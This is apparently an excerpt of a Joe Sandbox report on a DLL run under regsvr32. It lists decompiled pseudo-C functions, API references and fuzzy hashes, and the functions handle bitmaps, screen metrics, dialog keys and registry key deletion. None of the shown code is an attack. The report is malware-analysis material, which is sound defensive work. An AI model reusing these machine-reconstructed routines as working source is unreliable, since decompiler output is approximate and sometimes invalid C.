                                                                                                                                                                            0x1001495a
                                                                                                                                                                            0x10014961
                                                                                                                                                                            0x10014966
                                                                                                                                                                            0x10014970
                                                                                                                                                                            0x10014975
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014966
                                                                                                                                                                            0x10014953
                                                                                                                                                                            0x10014909
                                                                                                                                                                            0x100149ad
                                                                                                                                                                            0x100149ae
                                                                                                                                                                            0x1001488e
                                                                                                                                                                            0x1001488e
                                                                                                                                                                            0x1001488e
                                                                                                                                                                            0x100149bb

                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10014899
                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 100148E1
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                                                            • String ID: System
                                                                                                                                                                            • API String ID: 1529587224-3470857405
                                                                                                                                                                            • Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
                                                                                                                                                                            • Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
                                                                                                                                                                            • Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
                                                                                                                                                                            • Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                            			E1000B3AF(void* __edx, signed int _a116, char _a120) {
                                                                                                                                                                            				void _v12;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				int _v24;
                                                                                                                                                                            				char _v124;
                                                                                                                                                                            				char _v172;
                                                                                                                                                                            				intOrPtr _v184;
                                                                                                                                                                            				int __ebx;
                                                                                                                                                                            				signed int __edi;
                                                                                                                                                                            				signed int __esi;
                                                                                                                                                                            				signed int __ebp;
                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                            				unsigned int _t28;
                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                            				unsigned int _t39;
                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            				void* _t43;
                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                            
                                                                                                                                                                            				_t45 =  &_v124;
                                                                                                                                                                            				_t26 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_a116 = _t26 ^ _t45;
                                                                                                                                                                            				_push(_t43);
                                                                                                                                                                            				_push(_t42);
                                                                                                                                                                            				_t28 = GetMenuCheckMarkDimensions();
                                                                                                                                                                            				_t38 = _t28;
                                                                                                                                                                            				_t39 = _t28 >> 0x10;
                                                                                                                                                                            				_v24 = _t39;
                                                                                                                                                                            				if(_t28 <= 4 || __ecx <= 5) {
                                                                                                                                                                            					_push(_t45);
                                                                                                                                                                            					_push(_t39);
                                                                                                                                                                            					_v172 = 0x10057298;
                                                                                                                                                                            					E10017C83( &_v172, 0x1002e2fc);
                                                                                                                                                                            					asm("int3");
                                                                                                                                                                            					_push(4);
                                                                                                                                                                            					E10017BC1(E10027DEC, _t38, _t42, _t43);
                                                                                                                                                                            					_t40 = E10013965(0x104);
                                                                                                                                                                            					_v184 = _t40;
                                                                                                                                                                            					_t35 = 0;
                                                                                                                                                                            					_v172 = 0;
                                                                                                                                                                            					if(_t40 != 0) {
                                                                                                                                                                            						_t35 = E1000CF71(_t40);
                                                                                                                                                                            					}
                                                                                                                                                                            					return E10017C60(_t35);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if(__ebx > 0x20) {
                                                                                                                                                                            						__ebx = 0x20;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eax = __ebx - 4;
                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                            					__eax = __ebx - 4 - __edx;
                                                                                                                                                                            					__esi = __ebx + 0xf;
                                                                                                                                                                            					__esi = __ebx + 0xf >> 4;
                                                                                                                                                                            					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
                                                                                                                                                                            					__esi = __esi << 4;
                                                                                                                                                                            					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
                                                                                                                                                                            					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
                                                                                                                                                                            					if(__edi > 0xc) {
                                                                                                                                                                            						__edi = 0xc;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eax = 0x20;
                                                                                                                                                                            					if(__ecx > __eax) {
                                                                                                                                                                            						_v24 = __eax;
                                                                                                                                                                            					}
                                                                                                                                                                            					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
                                                                                                                                                                            					_v24 = _v24 + 0xfffffffa;
                                                                                                                                                                            					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
                                                                                                                                                                            					__ecx = __esi + __esi;
                                                                                                                                                                            					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
                                                                                                                                                                            					__edx = 0x1002a144;
                                                                                                                                                                            					_v20 = __esi + __esi;
                                                                                                                                                                            					_v16 = 5;
                                                                                                                                                                            					do {
                                                                                                                                                                            						__si =  *__edx & 0x000000ff;
                                                                                                                                                                            						__ecx = __edi;
                                                                                                                                                                            						__si = ( *__edx & 0x000000ff) << __cl;
                                                                                                                                                                            						__edx =  &(__edx[1]);
                                                                                                                                                                            						__ecx = __si & 0x0000ffff;
                                                                                                                                                                            						__eax->i = __ch;
                                                                                                                                                                            						__eax->i = __cl;
                                                                                                                                                                            						__eax = __eax + _v20;
                                                                                                                                                                            						_t21 =  &_v16;
                                                                                                                                                                            						 *_t21 = _v16 - 1;
                                                                                                                                                                            					} while ( *_t21 != 0);
                                                                                                                                                                            					__eax =  &_v12;
                                                                                                                                                                            					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
                                                                                                                                                                            					_pop(__edi);
                                                                                                                                                                            					_pop(__esi);
                                                                                                                                                                            					 *0x1005aa80 = __eax;
                                                                                                                                                                            					_pop(__ebx);
                                                                                                                                                                            					if(__eax == 0) {
                                                                                                                                                                            						__eax = LoadBitmapA(__eax, 0x7fe3);
                                                                                                                                                                            						 *0x1005aa80 = __eax;
                                                                                                                                                                            					}
                                                                                                                                                                            					__ecx = _a116;
                                                                                                                                                                            					__ecx = _a116 ^ __ebp;
                                                                                                                                                                            					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
                                                                                                                                                                            					__ebp =  &_a120;
                                                                                                                                                                            					__esp =  &_a120;
                                                                                                                                                                            					_pop(__ebp);
                                                                                                                                                                            					return __eax;
                                                                                                                                                                            				}
                                                                                                                                                                            			}






















                                                                                                                                                                            0x1000b3b0
                                                                                                                                                                            0x1000b3ba
                                                                                                                                                                            0x1000b3c1
                                                                                                                                                                            0x1000b3c5
                                                                                                                                                                            0x1000b3c6
                                                                                                                                                                            0x1000b3c7
                                                                                                                                                                            0x1000b3cd
                                                                                                                                                                            0x1000b3d6
                                                                                                                                                                            0x1000b3d9
                                                                                                                                                                            0x1000b3dc
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000b3e8
                                                                                                                                                                            0x1000b3eb
                                                                                                                                                                            0x1000b3ef
                                                                                                                                                                            0x1000b3ef
                                                                                                                                                                            0x1000b3f0
                                                                                                                                                                            0x1000b3f3
                                                                                                                                                                            0x1000b3f4
                                                                                                                                                                            0x1000b3f6
                                                                                                                                                                            0x1000b3f9
                                                                                                                                                                            0x1000b3fe
                                                                                                                                                                            0x1000b402
                                                                                                                                                                            0x1000b405
                                                                                                                                                                            0x1000b407
                                                                                                                                                                            0x1000b40c
                                                                                                                                                                            0x1000b410
                                                                                                                                                                            0x1000b410
                                                                                                                                                                            0x1000b413
                                                                                                                                                                            0x1000b416
                                                                                                                                                                            0x1000b418
                                                                                                                                                                            0x1000b418
                                                                                                                                                                            0x1000b429
                                                                                                                                                                            0x1000b431
                                                                                                                                                                            0x1000b439
                                                                                                                                                                            0x1000b43c
                                                                                                                                                                            0x1000b43f
                                                                                                                                                                            0x1000b443
                                                                                                                                                                            0x1000b448
                                                                                                                                                                            0x1000b44b
                                                                                                                                                                            0x1000b452
                                                                                                                                                                            0x1000b452
                                                                                                                                                                            0x1000b456
                                                                                                                                                                            0x1000b458
                                                                                                                                                                            0x1000b45b
                                                                                                                                                                            0x1000b45f
                                                                                                                                                                            0x1000b462
                                                                                                                                                                            0x1000b464
                                                                                                                                                                            0x1000b467
                                                                                                                                                                            0x1000b46a
                                                                                                                                                                            0x1000b46a
                                                                                                                                                                            0x1000b46a
                                                                                                                                                                            0x1000b46f
                                                                                                                                                                            0x1000b47b
                                                                                                                                                                            0x1000b483
                                                                                                                                                                            0x1000b484
                                                                                                                                                                            0x1000b485
                                                                                                                                                                            0x1000b48a
                                                                                                                                                                            0x1000b48b
                                                                                                                                                                            0x1000b493
                                                                                                                                                                            0x1000b499
                                                                                                                                                                            0x1000b499
                                                                                                                                                                            0x1000b49e
                                                                                                                                                                            0x1000b4a1
                                                                                                                                                                            0x1000b4a3
                                                                                                                                                                            0x1000b4a8
                                                                                                                                                                            0x1000b4ab
                                                                                                                                                                            0x1000b4ab
                                                                                                                                                                            0x1000b4ac
                                                                                                                                                                            0x1000b4ac

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
                                                                                                                                                                            • _memset.LIBCMT ref: 1000B429
                                                                                                                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
                                                                                                                                                                            • LoadBitmapA.USER32 ref: 1000B493
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4271682439-3916222277
                                                                                                                                                                            • Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
                                                                                                                                                                            • Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
                                                                                                                                                                            • Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                            			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                            				void _v20;
                                                                                                                                                                            				int _t14;
                                                                                                                                                                            				int _t18;
                                                                                                                                                                            				intOrPtr* _t23;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            
                                                                                                                                                                            				if(E1000D6C3() == 0) {
                                                                                                                                                                            					if(_a4 != 0x12340042) {
                                                                                                                                                                            						L9:
                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                            						L10:
                                                                                                                                                                            						return _t14;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t23 = _a8;
                                                                                                                                                                            					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                                                                                                                                                            						goto L9;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *((intOrPtr*)(_t23 + 4)) = 0;
                                                                                                                                                                            						 *((intOrPtr*)(_t23 + 8)) = 0;
                                                                                                                                                                            						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                                                                                                                                                                            						_t18 = GetSystemMetrics(1);
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                            						 *(_t23 + 0x10) = _t18;
                                                                                                                                                                            						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                                                                                                                                                                            						if( *_t23 >= 0x48) {
                                                                                                                                                                            							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t14 = 1;
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return  *0x1005a760(_a4, _a8);
                                                                                                                                                                            			}








                                                                                                                                                                            0x1000d87c
                                                                                                                                                                            0x1000d895
                                                                                                                                                                            0x1000d900
                                                                                                                                                                            0x1000d900
                                                                                                                                                                            0x1000d902
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d903
                                                                                                                                                                            0x1000d897
                                                                                                                                                                            0x1000d89e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d8b7
                                                                                                                                                                            0x1000d8b8
                                                                                                                                                                            0x1000d8bb
                                                                                                                                                                            0x1000d8c9
                                                                                                                                                                            0x1000d8cc
                                                                                                                                                                            0x1000d8d4
                                                                                                                                                                            0x1000d8d5
                                                                                                                                                                            0x1000d8d6
                                                                                                                                                                            0x1000d8d7
                                                                                                                                                                            0x1000d8de
                                                                                                                                                                            0x1000d8e1
                                                                                                                                                                            0x1000d8e5
                                                                                                                                                                            0x1000d8f4
                                                                                                                                                                            0x1000d8f9
                                                                                                                                                                            0x1000d8fc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d8fc
                                                                                                                                                                            0x1000d89e
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 1000D8C5
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 1000D8CC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: System$Metrics$InfoParameters
                                                                                                                                                                            • String ID: B$DISPLAY
                                                                                                                                                                            • API String ID: 3136151823-3316187204
                                                                                                                                                                            • Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
                                                                                                                                                                            • Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
                                                                                                                                                                            • Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				struct HWND__* _t10;
                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                            				struct HWND__* _t14;
                                                                                                                                                                            				struct HWND__* _t15;
                                                                                                                                                                            				int _t19;
                                                                                                                                                                            				void* _t21;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            				struct HWND__** _t26;
                                                                                                                                                                            				void* _t27;
                                                                                                                                                                            
                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                            				_t26 = _a4;
                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                            				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
                                                                                                                                                                            					_t10 = E1001040B(__ecx);
                                                                                                                                                                            					__eflags = _t10;
                                                                                                                                                                            					if(_t10 == 0) {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						__eflags = _t26[1] - 0x100;
                                                                                                                                                                            						if(_t26[1] != 0x100) {
                                                                                                                                                                            							L13:
                                                                                                                                                                            							return E1000E426(_t26);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t12 = _t26[2];
                                                                                                                                                                            						__eflags = _t12 - 0x1b;
                                                                                                                                                                            						if(_t12 == 0x1b) {
                                                                                                                                                                            							L8:
                                                                                                                                                                            							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
                                                                                                                                                                            							__eflags = _t14;
                                                                                                                                                                            							if(_t14 == 0) {
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                                                                                                                                                                            							__eflags = _t15;
                                                                                                                                                                            							if(_t15 == 0) {
                                                                                                                                                                            								L12:
                                                                                                                                                                            								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t19 = IsWindowEnabled(_t15);
                                                                                                                                                                            							__eflags = _t19;
                                                                                                                                                                            							if(_t19 == 0) {
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t12 - 3;
                                                                                                                                                                            						if(_t12 != 3) {
                                                                                                                                                                            							goto L13;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L8;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t10 + 0x68);
                                                                                                                                                                            					if( *(_t10 + 0x68) == 0) {
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				L1:
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}













                                                                                                                                                                            0x1000c570
                                                                                                                                                                            0x1000c570
                                                                                                                                                                            0x1000c572
                                                                                                                                                                            0x1000c577
                                                                                                                                                                            0x1000c580
                                                                                                                                                                            0x1000c589
                                                                                                                                                                            0x1000c58e
                                                                                                                                                                            0x1000c590
                                                                                                                                                                            0x1000c59c
                                                                                                                                                                            0x1000c59c
                                                                                                                                                                            0x1000c5a3
                                                                                                                                                                            0x1000c5fe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c601
                                                                                                                                                                            0x1000c5a5
                                                                                                                                                                            0x1000c5a8
                                                                                                                                                                            0x1000c5ab
                                                                                                                                                                            0x1000c5b2
                                                                                                                                                                            0x1000c5bc
                                                                                                                                                                            0x1000c5be
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5c7
                                                                                                                                                                            0x1000c5cc
                                                                                                                                                                            0x1000c5ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5d5
                                                                                                                                                                            0x1000c5db
                                                                                                                                                                            0x1000c5dd
                                                                                                                                                                            0x1000c5ea
                                                                                                                                                                            0x1000c5f6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5f6
                                                                                                                                                                            0x1000c5e0
                                                                                                                                                                            0x1000c5e6
                                                                                                                                                                            0x1000c5e8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5e8
                                                                                                                                                                            0x1000c5ad
                                                                                                                                                                            0x1000c5b0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c5b0
                                                                                                                                                                            0x1000c592
                                                                                                                                                                            0x1000c596
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c598
                                                                                                                                                                            0x1000c582
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Edit
                                                                                                                                                                            • API String ID: 0-554135844
                                                                                                                                                                            • Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
                                                                                                                                                                            • Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
                                                                                                                                                                            • Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
                                                                                                                                                                            • Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                            				void* _t32;
                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                            				signed int _t42;
                                                                                                                                                                            				void* _t43;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            				char** _t54;
                                                                                                                                                                            				void* _t55;
                                                                                                                                                                            				void* _t58;
                                                                                                                                                                            				char* _t59;
                                                                                                                                                                            				void* _t61;
                                                                                                                                                                            
                                                                                                                                                                            				_t42 = __ebx;
                                                                                                                                                                            				_t59 = _t61 - 0x104;
                                                                                                                                                                            				_t25 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_t59[0x108] = _t25 ^ _t59;
                                                                                                                                                                            				_push(0x18);
                                                                                                                                                                            				E10017BF4(E10027F23, __ebx, __edi, __esi);
                                                                                                                                                                            				_t54 = _t59[0x118];
                                                                                                                                                                            				_t44 = _t59[0x114];
                                                                                                                                                                            				_t52 = _t59 - 0x18;
                                                                                                                                                                            				 *(_t59 - 0x20) = _t44;
                                                                                                                                                                            				 *(_t59 - 0x1c) = _t54;
                                                                                                                                                                            				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
                                                                                                                                                                            				_t57 = _t30;
                                                                                                                                                                            				if(_t30 == 0) {
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
                                                                                                                                                                            						_t57 = _t34;
                                                                                                                                                                            						_t66 = _t57;
                                                                                                                                                                            						if(_t57 != 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
                                                                                                                                                                            						_push(_t59);
                                                                                                                                                                            						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
                                                                                                                                                                            						 *(_t59 - 4) = 1;
                                                                                                                                                                            						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
                                                                                                                                                                            						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
                                                                                                                                                                            						 *(_t59 - 4) = 0;
                                                                                                                                                                            						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
                                                                                                                                                                            						if(_t42 == 0) {
                                                                                                                                                                            							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t57 - 0x103;
                                                                                                                                                                            					if(_t57 == 0x103) {
                                                                                                                                                                            						L6:
                                                                                                                                                                            						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags = _t57 - 0x3f2;
                                                                                                                                                                            						if(_t57 == 0x3f2) {
                                                                                                                                                                            							goto L6;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					RegCloseKey( *(_t59 - 0x18));
                                                                                                                                                                            				}
                                                                                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
                                                                                                                                                                            				_pop(_t55);
                                                                                                                                                                            				_pop(_t58);
                                                                                                                                                                            				_pop(_t43);
                                                                                                                                                                            				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
                                                                                                                                                                            				__eflags =  &(_t59[0x10c]);
                                                                                                                                                                            				return _t32;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1000bc89
                                                                                                                                                                            0x1000bc90
                                                                                                                                                                            0x1000bc94
                                                                                                                                                                            0x1000bc9b
                                                                                                                                                                            0x1000bca1
                                                                                                                                                                            0x1000bca8
                                                                                                                                                                            0x1000bcad
                                                                                                                                                                            0x1000bcb5
                                                                                                                                                                            0x1000bcbb
                                                                                                                                                                            0x1000bcc1
                                                                                                                                                                            0x1000bcc4
                                                                                                                                                                            0x1000bcc7
                                                                                                                                                                            0x1000bccd
                                                                                                                                                                            0x1000bcd1
                                                                                                                                                                            0x1000bcd7
                                                                                                                                                                            0x1000bce5
                                                                                                                                                                            0x1000bceb
                                                                                                                                                                            0x1000bced
                                                                                                                                                                            0x1000bcef
